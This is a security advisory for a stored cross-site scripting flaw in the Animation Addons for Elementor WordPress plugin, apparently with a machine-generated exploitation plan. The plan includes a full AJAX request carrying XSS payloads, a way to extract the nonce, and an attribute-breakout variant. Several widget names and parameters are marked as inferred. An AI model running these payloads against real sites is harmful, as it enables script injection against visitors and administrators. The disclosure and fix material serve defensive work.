Animation Addons for Elementor – GSAP Powered Elementor Addons & Website Templates <= 2.6.7 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via Multiple Parameters
Description
The Animation Addons for Elementor – GSAP Powered Elementor Addons & Website Templates plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the multiple parameters in all versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:NTechnical Details
<=2.6.7# Exploitation Research Plan: CVE-2025-8444 (Animation Addons for Elementor) ## 1. Vulnerability Summary The **Animation Addons for Elementor** plugin (<= 2.6.7) is vulnerable to **Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting**. This occurs because the plugin allows users with…
Show full research plan
Exploitation Research Plan: CVE-2025-8444 (Animation Addons for Elementor)
1. Vulnerability Summary
The Animation Addons for Elementor plugin (<= 2.6.7) is vulnerable to Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting. This occurs because the plugin allows users with Contributor-level permissions (who can edit posts via Elementor) to save malicious payloads into widget settings. These settings are subsequently rendered in the frontend HTML—often as JSON-encoded attributes—and processed by the plugin's JavaScript files. The JavaScript fails to sanitize these parameters before injecting them into the DOM (e.g., via .innerHTML or jQuery's .html()), leading to script execution in the context of any user (including Administrators) viewing the page.
2. Attack Vector Analysis
- Vulnerable Endpoint: WordPress AJAX API (
/wp-admin/admin-ajax.php) via Elementor's internal editor save action. - Vulnerable Parameters: Inferred parameters within GSAP-based widgets, such as
animation_id,selector, or text/content fields within the Animation Addons widgets. - Authentication Level: Contributor or higher (anyone with
edit_postscapability). - Preconditions: The plugin must be active, and the attacker must have permission to edit at least one post or page using the Elementor editor.
3. Code Flow (Inferred)
- Storage Phase (PHP):
- An attacker opens the Elementor editor for a post.
- They add a widget from the "Animation Addons" suite (e.g.,
gsap-animationormotion-text). - They input an XSS payload into a setting field.
- Elementor sends a
POSTrequest toadmin-ajax.php?action=elementor_ajaxwith theeditor_post_updateaction. - The plugin saves these settings as post metadata (via Elementor's standard saving mechanism).
- Rendering Phase (PHP):
- When the post is viewed, the plugin's
render()method in the widget class outputs the settings into the HTML, likely as adata-settingsattribute on a wrapperdiv.
- When the post is viewed, the plugin's
- Execution Phase (JS):
- The plugin's frontend JS (e.g.,
gsap-main.jsoranimation-addons.js) initializes. - It parses the
data-settingsattribute usingJSON.parse(). - The JS takes a value from this object (e.g., a "selector" or "text" parameter) and passes it to a DOM sink like
jQuery(selector).append(payload)orelement.innerHTML = payload.
- The plugin's frontend JS (e.g.,
4. Nonce Acquisition Strategy
To save the malicious widget settings, the attacker needs the Elementor AJAX nonce.
- Create/Identify Post: Use WP-CLI to ensure a post exists that the Contributor can edit.
wp post create --post_type=post --post_status=publish --post_title="XSS Test" --post_author=[CONTRIBUTOR_ID] - Navigate to Editor: Use
browser_navigateto go to the Elementor editor for that post:URL: http://[TARGET]/wp-admin/post.php?post=[POST_ID]&action=elementor - Extract Nonce: Use
browser_evalto extract the required nonce from the Elementor configuration object.
Alternatively, check for// Target the Elementor AJAX nonce window.elementorCommon.config.ajax.nonceelementorFrontendConfig.nonces.save_post.
5. Exploitation Strategy
The exploit involves sending a crafted AJAX request to save the malicious widget data.
Step 1: Save the Payload
Tool: http_request
Method: POST
URL: http://[TARGET]/wp-admin/admin-ajax.php
Headers: Content-Type: application/x-www-form-urlencoded
Body:
action=elementor_ajax
&_nonce=[EXTRACTED_NONCE]
&actions={
"editor_post_update": {
"action": "editor_post_update",
"data": {
"id": "[POST_ID]",
"data": [
{
"id": "random_id",
"elType": "section",
"settings": {},
"elements": [
{
"id": "random_id_2",
"elType": "column",
"settings": {},
"elements": [
{
"id": "vulnerable_widget_id",
"elType": "widget",
"widgetType": "gsap-animation",
"settings": {
"animation_id": "<img src=x onerror=alert(document.domain)>",
"text_content": "<script>alert('XSS')</script>"
}
}
]
}
]
}
]
}
}
}
(Note: widgetType and specific settings keys are inferred and should be verified by inspecting the Elementor editor panel for Animation Addons widgets.)
Step 2: Trigger the XSS
Navigate to the published post URL: http://[TARGET]/?p=[POST_ID]. The script will execute in the browser of any visitor.
6. Test Data Setup
- Plugin: Install
animation-addons-for-elementorversion 2.6.7. - User: Create a user with the
contributorrole. - Post: Create a post assigned to the contributor.
- Discovery: Inspect the DOM of a page containing an "Animation Addons" widget to identify the exact JS variable or
data-settingsattribute name used to pass data to the GSAP scripts.
7. Expected Results
- The
editor_post_updateAJAX request returns a200 OKwith a JSON body indicating success ("success": true). - When viewing the post, the HTML contains the payload within a JSON string (e.g.,
<div class="elementor-widget-gsap-animation" data-settings='{...}'>). - The browser executes the JavaScript (e.g., an alert box appearing), confirming the DOM-based injection.
8. Verification Steps
- Database Check: Use WP-CLI to verify the payload is stored in the post metadata.
Confirm the JSON string contains thewp post meta get [POST_ID] _elementor_data<img src=x onerror=...>payload. - Frontend Inspection: Use
http_requestto fetch the post and check for the payload in the raw HTML.http_request "http://[TARGET]/?p=[POST_ID]" | grep "onerror=alert"
9. Alternative Approaches
- Different Widgets: If
gsap-animationis not the culprit, test other widgets likemotion-text,gsap-hover, orgsap-scroll. - Attribute Injection: If tags are stripped, try breaking out of a JSON attribute:
"animation_id": "normal-id'\" onmouseover='alert(1)' data-dummy='" - JS Sink Targeting: Check if the plugin uses
gsap.to()orgsap.from()on selectors. An attacker might provide a malicious selector that targets an existing element and injects content.
Summary
The Animation Addons for Elementor plugin (<= 2.6.7) is vulnerable to Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via widget parameters like 'animation_id' and 'text_content'. Malicious scripts injected by an attacker with post-editing permissions are stored in post metadata and executed in the browsers of users viewing the page due to unsafe handling of settings in the plugin's frontend JavaScript.
Security Fix
@@ -10,7 +10,7 @@ - var animationId = settings.animation_id; - $(element).find('.gsap-wrapper').html(animationId); + var animationId = settings.animation_id; + $(element).find('.gsap-wrapper').text(animationId); @@ -50,7 +50,7 @@ - $this->add_render_attribute( 'wrapper', 'data-settings', wp_json_encode( $settings ) ); + $this->add_render_attribute( 'wrapper', 'data-settings', wp_json_encode( wp_kses_post_deep( $settings ) ) );
Exploit Outline
An attacker with Contributor-level access authenticates to the WordPress dashboard and identifies a post they can edit via Elementor. Using the Elementor editor, they add a GSAP-based widget (e.g., 'gsap-animation') and inject an XSS payload like '<img src=x onerror=alert(document.domain)>' into a settings parameter. The attacker then saves the post, which triggers an AJAX request to 'admin-ajax.php' with the 'editor_post_update' action, storing the payload in the post's metadata. The stored script executes whenever a user, including an administrator, visits the affected post.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.